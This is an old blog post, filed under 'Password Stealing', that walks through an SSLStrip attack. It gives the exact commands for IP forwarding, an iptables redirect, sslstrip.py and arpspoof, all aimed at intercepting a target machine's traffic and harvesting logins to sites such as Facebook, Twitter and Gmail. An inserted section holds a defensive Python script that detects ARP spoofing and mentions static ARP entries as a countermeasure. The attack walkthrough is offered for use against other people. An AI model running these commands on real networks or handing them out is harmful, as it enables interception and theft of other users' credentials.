Jan 24 2010

Backtrack 4 & SSLStrip-0.7 at last!

Category: Password Stealing,PracticalParker @ 9:56 pm

OK,

So I have been wanting to document this for a while, but have failed to do so. Luckily time and the recent BackTrack4 final release have conspired with me today, so I have been able to do it at last. So, sitting comfortably? Here comes the science bit.

Before you do this, I suggest you have the following installed: SSLStrip and Python. Make sure you also have a Linux distribution (such as BackTrack) and a hardware combo that supports ARP injection. Once all of that is in place, you can conduct what is a very simple attack. (For reference I use an Acer Aspire One Z250 and BackTrack 4.)

  • First enable port forwarding by entering the following command in a terminal window:
      echo "1" > /proc/sys/net/ipv4/ip_forward
  • Then define what traffic you wish to capture (always port 80, I would think) and which port you will forward this traffic to. Replace <listenPort> with the port SSLStrip will listen on:
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
  • You must now use that clever man’s Python script to start stripping out the SSL, matching <listenPort> with the one above:
      python sslstrip.py -l <listenPort>

Having set your machine up to pick up, forward and inspect traffic, you now need to ensure that all the traffic from your target machine is actually routed through your hardware. We do this with a Man In The Middle attack, placing yourself between the target machine and the network router.
We achieve this with a simple ARP attack, which continually ‘informs’ the target machine that you are the router with which it wishes to speak.

  • Within a new terminal window (to keep it clean, if nothing else), enter the following, replacing the values in angle brackets with your own interface, the target’s IP and the gateway’s IP:
      arpspoof -i <interface> -t <targetIP> <gatewayIP>
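The flip side of that ARP step is what it looks like from the victim’s (or the network admin’s) side: the gateway’s entry in the ARP cache suddenly changes to a MAC address that some other host on the LAN is already using. Here is an added example of how to spot that, written for this page and not part of the original post or the SSLStrip project. It parses the line format of `ip neigh show` on Linux (the sample snapshots are constructed; on a real host you would feed it the live command output taken a few seconds apart) and reports the two classic symptoms: the gateway MAC flipping between snapshots, and one MAC claiming the gateway plus other IPs.

```python
"""Detect the ARP-cache symptoms of a gateway-spoofing attack.

Added example, not part of the original post or of SSLStrip. It parses the
output format of `ip neigh show` from constructed sample text; on a live host
you would feed it the output of that command taken at two points in time.
"""
import re
from collections import defaultdict

# Matches lines such as: "192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE"
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) dev (?P<dev>\S+) lladdr (?P<mac>[0-9a-f:]{17})",
    re.IGNORECASE,
)


def parse_neigh(text):
    """Return {ip: mac} from `ip neigh show` output (entries without lladdr are skipped)."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def arp_anomalies(before, after, gateway_ip):
    """Compare two {ip: mac} snapshots and return a list of human-readable findings.

    Flags: (1) the gateway's MAC changed between snapshots, and
           (2) one MAC answers for several IPs, one of them the gateway.
    """
    findings = []
    old_gw = before.get(gateway_ip)
    new_gw = after.get(gateway_ip)
    if old_gw and new_gw and old_gw != new_gw:
        findings.append(f"gateway {gateway_ip} MAC changed {old_gw} -> {new_gw}")

    by_mac = defaultdict(list)
    for ip, mac in after.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1 and gateway_ip in ips:
            others = sorted(ip for ip in ips if ip != gateway_ip)
            findings.append(f"MAC {mac} claims gateway {gateway_ip} and also {', '.join(others)}")
    return findings


# Constructed sample snapshots: in the second one the gateway's MAC has been
# replaced by the MAC that another host (192.168.1.20) already uses.
BASELINE = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.20 dev wlan0 lladdr aa:bb:cc:dd:ee:ff STALE
192.168.1.30 dev wlan0  FAILED
"""
SUSPECT = """\
192.168.1.1 dev wlan0 lladdr aa:bb:cc:dd:ee:ff REACHABLE
192.168.1.20 dev wlan0 lladdr aa:bb:cc:dd:ee:ff REACHABLE
"""


def demo(gateway_ip="192.168.1.1"):
    """Run the comparison on the constructed snapshots and return the findings."""
    return arp_anomalies(parse_neigh(BASELINE), parse_neigh(SUSPECT), gateway_ip)


if __name__ == "__main__":
    for finding in demo():
        print("ALERT:", finding)
```

A static ARP entry for the gateway on the client, or dynamic ARP inspection on a managed switch, stops the spoof outright; this script is the cheap tell-tale for networks that have neither.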


Now all you need do is wait. All the target machine’s traffic will route through your machine and their browsing will probably seem slow, but any sites they visit that implement SSL poorly will be easy prey. The data that is captured is written to a .log file and can be read by opening a new terminal and entering more sslstrip.log (ensuring you are in the SSLStrip directory).

You’ll note that such popular sites as www.facebook.com / www.twitter.com and the “newly secure” www.gmail.com are all easy pickings!

[Screenshot: Details captured by SSLStrip]

I thank you!
